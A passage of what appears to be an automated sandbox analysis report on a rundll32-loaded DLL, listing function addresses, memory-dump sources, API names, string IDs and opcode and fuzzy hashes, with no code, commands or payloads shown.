                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunct
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                  • API String ID: 2786813426-2799312399
                                                                                                                                  • Opcode ID: 310c16e434c6fb425f377aa5a3344d56e60155a5009237bc210dd0dc5f72e661
                                                                                                                                  • Instruction ID: 5fe4dd189a2d79ce61165057c9ebb2e090cd9d14d433b9fec00325c66f72dead
                                                                                                                                  • Opcode Fuzzy Hash: 310c16e434c6fb425f377aa5a3344d56e60155a5009237bc210dd0dc5f72e661
                                                                                                                                  • Instruction Fuzzy Hash: F0129C36704A88C9FBA28F65D0507ED27A1EB49BC9F54C112EE8A1F789DF35CA49C350
                                                                                                                                  Function 000000018000A314 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 451COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunct
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                  • API String ID: 2786813426-2799312399
                                                                                                                                  • Opcode ID: cc0dd99451e0eb2a4836ac02799361a5a9bcabcee1e262923024bb7c99d54d77
                                                                                                                                  • Instruction ID: f7f63c79d1b94fbb45dab63fbf242b30916648d9a31090d02f6495e4854cce8f
                                                                                                                                  • Opcode Fuzzy Hash: cc0dd99451e0eb2a4836ac02799361a5a9bcabcee1e262923024bb7c99d54d77
                                                                                                                                  • Instruction Fuzzy Hash: B9129036708A8889FB92CA75C4503EC3BB1A74ABD8F58C115EE491B796CF75CA4EC350
                                                                                                                                  Function 00007FFD92DB3450 Relevance: 3.8, Strings: 2, Instructions: 1299COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: yxxxxxxx$yxxxxxxx
                                                                                                                                  • API String ID: 0-3283245749
                                                                                                                                  • Opcode ID: 7d9fa7265bc996f957563da1dd5862a03a90015394d3ce2fb4214068eaf7c381
                                                                                                                                  • Instruction ID: 96bb0052e805f84f3b082e87b541d621cfb1aaf0f07c8fbdf5a9d2f5560b2fe2
                                                                                                                                  • Opcode Fuzzy Hash: 7d9fa7265bc996f957563da1dd5862a03a90015394d3ce2fb4214068eaf7c381
                                                                                                                                  • Instruction Fuzzy Hash: C342E362B05B8582EE208B69D5982BE63A0FB44BE5F549339DFAD077D5DF78E081C300
                                                                                                                                  Function 00007FFD92DB3C80 Relevance: 3.2, Strings: 2, Instructions: 660COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: utf-8$utf8
                                                                                                                                  • API String ID: 0-782216586
                                                                                                                                  • Opcode ID: 5c8a2b00930e2f7a18b3fc2fde5d45f0d464ceee0ebcf5cbc8d5aafa92ce447a
                                                                                                                                  • Instruction ID: ea4edbc2567cbde75b75c5eea532ba161f320a2d9e3f812b416ab37aa101010c
                                                                                                                                  • Opcode Fuzzy Hash: 5c8a2b00930e2f7a18b3fc2fde5d45f0d464ceee0ebcf5cbc8d5aafa92ce447a
                                                                                                                                  • Instruction Fuzzy Hash: 99D1A331B0868681FB74EFF2A9317BA2695FF80795F105635EE4E43A85EFBCE4018650
                                                                                                                                  Function 00007FFD92DB2920 Relevance: 2.5, Instructions: 2537COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b86157ba1437e25ff90c112611880fb949198c74eec9fb249c96254bbc697d5b
                                                                                                                                  • Instruction ID: cd3c2300727b0a54f4b99c5262173322527ff9707f5e07466086b05885594800
                                                                                                                                  • Opcode Fuzzy Hash: b86157ba1437e25ff90c112611880fb949198c74eec9fb249c96254bbc697d5b
                                                                                                                                  • Instruction Fuzzy Hash: AD82EB22B08A4251FA31EFA5E4A00F96750EF947F5F184335EA6D07AE9DF6CE942C740
                                                                                                                                  Function 00007FFD92DB4BE0 Relevance: 2.0, APIs: 1, Instructions: 735COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 8996560bcfa92c646806b7d33099c803cfa12234436812cabb9c656e3ce3456e
                                                                                                                                  • Instruction ID: 0c59cbc31332c9f785b9a5fc86537a91f3bc072149a795668683ef2cf8b8ccd3
                                                                                                                                  • Opcode Fuzzy Hash: 8996560bcfa92c646806b7d33099c803cfa12234436812cabb9c656e3ce3456e
                                                                                                                                  • Instruction Fuzzy Hash: 8AF1AD32B05B4196FB24DFA6E5602AD33A4FB48BC9B000235DE1E57BA5DF78E525C390
                                                                                                                                  Function 0000000180019020 Relevance: 1.8, APIs: 1, Instructions: 283COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4240859931-0
                                                                                                                                  • Opcode ID: 63fef931675e363a9749f96429758758dd3006f32cce81dee63d7a14f1cdfd87
                                                                                                                                  • Instruction ID: b4b31d92be3c4c8e502b6ea2e0a282e668397faed0ae34e767a83c581478e39b
                                                                                                                                  • Opcode Fuzzy Hash: 63fef931675e363a9749f96429758758dd3006f32cce81dee63d7a14f1cdfd87
                                                                                                                                  • Instruction Fuzzy Hash: FBC1A232B06A9899FB52CFB5C4013EC63B1BB5DB88F448111EE4967A99DF39C64EC340
                                                                                                                                  Function 00000001800193F0 Relevance: 1.8, APIs: 1, Instructions: 283COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4240859931-0
                                                                                                                                  • Opcode ID: 9787ca75ca63df748a1499e8dd1c5abcefd6f6751ff6d03e7f7fc609e9ac6cfc
                                                                                                                                  • Instruction ID: 7c40f0623f709e12c7f828199f14d4f1bd29be792234f51f62a64cc8c6a646a4
                                                                                                                                  • Opcode Fuzzy Hash: 9787ca75ca63df748a1499e8dd1c5abcefd6f6751ff6d03e7f7fc609e9ac6cfc
                                                                                                                                  • Instruction Fuzzy Hash: B2C1A332B06E9889FB52CFB5D4017EC63B1BB59788F448511EE4967A89EF38C64EC340
                                                                                                                                  Function 00007FFD92FE08A8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                  • Opcode ID: f89d0cd4bb0fd192fd544f51d60563079563efa4160fb70afde1a4246156f38b
                                                                                                                                  • Instruction ID: 86c1e4c2a260d22c372b26a19b02f8b93bc019dc7fcfc8f039e828ecd7292bba
                                                                                                                                  • Opcode Fuzzy Hash: f89d0cd4bb0fd192fd544f51d60563079563efa4160fb70afde1a4246156f38b
                                                                                                                                  • Instruction Fuzzy Hash: AF110567B096458AFB218F56D4606AC77A0FB60FB1F448239C669533C0CAB8D6D1C740
                                                                                                                                  Function 00007FFD92DBB110 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DebuggerPresenttry_get_function
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2161787604-0
                                                                                                                                  • Opcode ID: 28ebdc6c2a637fb53ad7e8d10132abff894cd7c522ca1664283100d6c8bc214f
                                                                                                                                  • Instruction ID: d369b93c86ee76ec876b3f00d181936de25f43b74412cd33c966604ad5925330
                                                                                                                                  • Opcode Fuzzy Hash: 28ebdc6c2a637fb53ad7e8d10132abff894cd7c522ca1664283100d6c8bc214f
                                                                                                                                  • Instruction Fuzzy Hash: 8111A161B0C24341FB70AED3B4612BE5294AF41792F185335EA4D8BB86CFACE8454260
                                                                                                                                  Function 00007FFD92DB56A0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                  • Opcode ID: 636ca2e8d16714f8e9f5f800e23f672016befd2f66aaf1b834946735b8b5e2b1
                                                                                                                                  • Instruction ID: 78a5eb190ef1ea8984604acd834f8efde160629e2c3cf962485c0323d79bad7e
                                                                                                                                  • Opcode Fuzzy Hash: 636ca2e8d16714f8e9f5f800e23f672016befd2f66aaf1b834946735b8b5e2b1
                                                                                                                                  • Instruction Fuzzy Hash: 8E118F36B18A8482F720CB66E55836D77A0BB88BA4F540325DB6C47BD5CFBCD440C750
                                                                                                                                  Function 00007FFD92FE09A8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumLocalesSystem
